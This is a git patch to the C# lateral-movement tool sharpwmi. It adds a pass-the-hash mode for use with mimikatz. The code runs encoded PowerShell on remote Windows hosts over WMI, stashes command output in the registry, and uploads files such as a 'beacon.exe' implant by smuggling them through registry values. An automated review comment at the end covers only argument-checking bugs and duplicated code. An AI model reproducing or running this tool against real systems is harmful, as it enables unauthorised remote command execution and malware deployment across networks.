From 2ff1bf5144d97e0a8c3bea1d9d9e71c3554c9e2c Mon Sep 17 00:00:00 2001
From: n0thing <63334123+n0thing0x01@users.noreply.github.com>
Date: Wed, 26 Aug 2020 17:15:41 +0800
Subject: [PATCH] =?UTF-8?q?=E6=94=AF=E6=8C=81=E4=B8=8Emimikatz=E7=9A=84pth?=
 =?UTF-8?q?=E4=BA=A4=E4=BA=92?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 sharpwmi/sharpwmi/Program.cs | 169 +++++++++++++++++++++++++----------
 1 file changed, 123 insertions(+), 46 deletions(-)
diff --git a/sharpwmi/sharpwmi/Program.cs b/sharpwmi/sharpwmi/Program.cs
index 2f17f6f..d404275 100644
--- a/sharpwmi/sharpwmi/Program.cs
+++ b/sharpwmi/sharpwmi/Program.cs
@@ -1,4 +1,4 @@
-using System;
+using System;
 using System.Text;
 using System.Threading;
 using System.IO;
@@ -35,85 +35,162 @@ public static string Base64Decode(string content) byte[] bytes = Convert.FromBase64String(content); return Encoding.Unicode.GetString(bytes); } + + public void run(string[] args) { - if (args.Length < 5) + if (args.Length < 3) { - Console.WriteLine("\n \t\tsharpwmi.exe 192.168.2.3 administrator 123 cmd whoami\n\t\tsharpwmi.exe 192.168.2.3 administrator 123 upload beacon.exe c:\\beacon.exe"); + Console.WriteLine("\n\t\tsharpwmi.exe 192.168.2.3 administrator 123 cmd whoami\n\t\tsharpwmi.exe 192.168.2.3 administrator 123 upload beacon.exe c:\\beacon.exe\n\t\tsharpwmi.exe pth 192.168.2.3 cmd whoami\n\t\tsharpwmi.exe pth 192.168.2.3 upload beacon.exe c:\\beacon.exe"); return; } - ConnectionOptions options = new ConnectionOptions(); - string host = args[0]; - options.Username = args[1]; - options.Password = args[2]; + if (args[0] == "pth") { - int delay = 5000; + string host = args[1]; + string func_name = args[2]; + string command = ""; + string local_file = ""; + string remote_file = ""; + if (func_name == "cmd") + { + command=args[3]; + } + else + { + local_file = args[3]; + remote_file = args[4]; + } + ConnectionOptions options = new ConnectionOptions(); - this.scope = new ManagementScope("\\\\" + host + "\\root\\cimv2", options); - this.scope.Options.Impersonation = System.Management.ImpersonationLevel.Impersonate; - this.scope.Options.EnablePrivileges = true; - this.scope.Connect(); + int delay = 5000; + this.scope = new ManagementScope("\\\\" + host + "\\root\\cimv2", options); + this.scope.Options.Impersonation = System.Management.ImpersonationLevel.Impersonate; + this.scope.Options.EnablePrivileges = true; + this.scope.Connect(); + if (func_name == "cmd") { + string powershell_command = "powershell -enc " + Base64Encode(command); - if (args[3] == "cmd") - { - string powershell_command = "powershell -enc " + Base64Encode(args[4]); + string code = "$a=(" + powershell_command + 
");$b=[Convert]::ToBase64String([System.Text.UnicodeEncoding]::Unicode.GetBytes($a));$reg = Get-WmiObject -List -Namespace root\\default | Where-Object {$_.Name -eq \"StdRegProv\"};$reg.SetStringValue(2147483650,\"\",\"txt\",$b)"; + + ExecCmd("powershell -enc " + Base64Encode(code)); + Console.WriteLine("[+]Exec done!\n"); + Thread.Sleep(delay); + + //this.ExecCmd("whoami"); + // 读取注册表 + ManagementClass registry = new ManagementClass(this.scope, new ManagementPath("StdRegProv"), null); + ManagementBaseObject inParams = registry.GetMethodParameters("GetStringValue"); + + inParams["sSubKeyName"] = ""; + inParams["sValueName"] = "txt"; + ManagementBaseObject outParams = registry.InvokeMethod("GetStringValue", inParams, null); + // (String)outParams["sValue"]; - string code = "$a=(" + powershell_command + ");$b=[Convert]::ToBase64String([System.Text.UnicodeEncoding]::Unicode.GetBytes($a));$reg = Get-WmiObject -List -Namespace root\\default | Where-Object {$_.Name -eq \"StdRegProv\"};$reg.SetStringValue(2147483650,\"\",\"txt\",$b)"; + Console.WriteLine("[+]output -> \n\n" + Base64Decode(outParams["sValue"].ToString())); + }else if (func_name == "upload") + { + byte[] str = File.ReadAllBytes(local_file); - ExecCmd("powershell -enc " + Base64Encode(code)); - Console.WriteLine("[+]Exec done!\n"); - Thread.Sleep(delay); + ManagementClass registry = new ManagementClass(this.scope, new ManagementPath("StdRegProv"), null); + ManagementBaseObject inParams = registry.GetMethodParameters("SetStringValue"); + inParams["hDefKey"] = 2147483650; //HKEY_LOCAL_MACHINE; + inParams["sSubKeyName"] = @""; + inParams["sValueName"] = "upload"; - //this.ExecCmd("whoami"); - // 读取注册表 - ManagementClass registry = new ManagementClass(this.scope, new ManagementPath("StdRegProv"), null); - ManagementBaseObject inParams = registry.GetMethodParameters("GetStringValue"); + inParams["sValue"] = Convert.ToBase64String(str); + ManagementBaseObject outParams = registry.InvokeMethod("SetStringValue", 
inParams, null); - inParams["sSubKeyName"] = ""; - inParams["sValueName"] = "txt"; - ManagementBaseObject outParams = registry.InvokeMethod("GetStringValue", inParams, null); - // (String)outParams["sValue"]; - Console.WriteLine("[+]output -> \n\n" + Base64Decode(outParams["sValue"].ToString())); + + //通过注册表还原文件 + string pscode = string.Format("$wmi = [wmiclass]\"Root\\default:stdRegProv\";$data=($wmi.GetStringValue(2147483650,\"\",\"upload\")).sValue;$byteArray = [Convert]::FromBase64String($data);[io.file]::WriteAllBytes(\"{0:s}\",$byteArray);;", remote_file); + string powershell_command = "powershell -enc " + Base64Encode(pscode); + + Thread.Sleep(delay); + ExecCmd(powershell_command); + Console.WriteLine("[+]Upload file done!"); + return; + } + } - else if (args[3] == "upload") + else { + ConnectionOptions options = new ConnectionOptions(); + string host = args[0]; + options.Username = args[1]; + options.Password = args[2]; - //写注册表 - byte[] str = File.ReadAllBytes(args[4]); + int delay = 5000; + this.scope = new ManagementScope("\\\\" + host + "\\root\\cimv2", options); + this.scope.Options.Impersonation = System.Management.ImpersonationLevel.Impersonate; + this.scope.Options.EnablePrivileges = true; + this.scope.Connect(); - ManagementClass registry = new ManagementClass(this.scope, new ManagementPath("StdRegProv"), null); - ManagementBaseObject inParams = registry.GetMethodParameters("SetStringValue"); - inParams["hDefKey"] = 2147483650; //HKEY_LOCAL_MACHINE; - inParams["sSubKeyName"] = @""; - inParams["sValueName"] = "upload"; + if (args[3] == "cmd") + { + string powershell_command = "powershell -enc " + Base64Encode(args[4]); - inParams["sValue"] = Convert.ToBase64String(str); - ManagementBaseObject outParams = registry.InvokeMethod("SetStringValue", inParams, null); + string code = "$a=(" + powershell_command + ");$b=[Convert]::ToBase64String([System.Text.UnicodeEncoding]::Unicode.GetBytes($a));$reg = Get-WmiObject -List -Namespace root\\default | 
Where-Object {$_.Name -eq \"StdRegProv\"};$reg.SetStringValue(2147483650,\"\",\"txt\",$b)"; + ExecCmd("powershell -enc " + Base64Encode(code)); + Console.WriteLine("[+]Exec done!\n"); + Thread.Sleep(delay); - //通过注册表还原文件 - string pscode = string.Format("$wmi = [wmiclass]\"Root\\default:stdRegProv\";$data=($wmi.GetStringValue(2147483650,\"\",\"upload\")).sValue;$byteArray = [Convert]::FromBase64String($data);[io.file]::WriteAllBytes(\"{0:s}\",$byteArray);;", args[5]); - string powershell_command = "powershell -enc " + Base64Encode(pscode); + //this.ExecCmd("whoami"); + // 读取注册表 + ManagementClass registry = new ManagementClass(this.scope, new ManagementPath("StdRegProv"), null); + ManagementBaseObject inParams = registry.GetMethodParameters("GetStringValue"); - Thread.Sleep(delay); - ExecCmd(powershell_command); - Console.WriteLine("[+]Upload file done!"); - return; + inParams["sSubKeyName"] = ""; + inParams["sValueName"] = "txt"; + ManagementBaseObject outParams = registry.InvokeMethod("GetStringValue", inParams, null); + // (String)outParams["sValue"]; - } + Console.WriteLine("[+]output -> \n\n" + Base64Decode(outParams["sValue"].ToString())); + } + else if (args[3] == "upload") + { + + //写注册表 + byte[] str = File.ReadAllBytes(args[4]); + + + ManagementClass registry = new ManagementClass(this.scope, new ManagementPath("StdRegProv"), null); + ManagementBaseObject inParams = registry.GetMethodParameters("SetStringValue"); + inParams["hDefKey"] = 2147483650; //HKEY_LOCAL_MACHINE; + inParams["sSubKeyName"] = @""; + inParams["sValueName"] = "upload"; + + inParams["sValue"] = Convert.ToBase64String(str); + ManagementBaseObject outParams = registry.InvokeMethod("SetStringValue", inParams, null); + + + + //通过注册表还原文件 + string pscode = string.Format("$wmi = [wmiclass]\"Root\\default:stdRegProv\";$data=($wmi.GetStringValue(2147483650,\"\",\"upload\")).sValue;$byteArray = [Convert]::FromBase64String($data);[io.file]::WriteAllBytes(\"{0:s}\",$byteArray);;", args[5]); + string 
powershell_command = "powershell -enc " + Base64Encode(pscode); + + Thread.Sleep(delay); + ExecCmd(powershell_command); + Console.WriteLine("[+]Upload file done!"); + return; + + } + } + + } static void Main(string[] args) {
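Review bot: The relaxed guard `if (args.Length < 3)` at the top of `run` no longer covers the indexes the new code reads: the `pth` branch reads `args[3]` for `cmd` and `args[4]` for `upload`, and the credentialed branch still reads `args[3]`, `args[4]` and `args[5]`, so a short argument list now fails with an IndexOutOfRangeException instead of printing the usage text. A per-branch length check before the first indexed read would restore the intended behaviour, e.g. `if (args.Length < (func_name == "cmd" ? 4 : 5)) { /* print usage */ return; }` in the `pth` branch, and the equivalent `< 5` (cmd) / `< 6` (upload) check in the other branch. Separately, the two branches duplicate the ManagementScope setup and the whole cmd/upload body verbatim; only the argument offsets and the `options.Username`/`options.Password` assignment differ, so parsing both forms into `host`, `func_name`, `command`, `local_file`, `remote_file` and an optional credential pair up front would let a single copy of the body serve both and keep later fixes from having to be applied twice. Both copies also call `outParams["sValue"].ToString()` without a null check; if the value is absent this throws rather than reporting that no result was found.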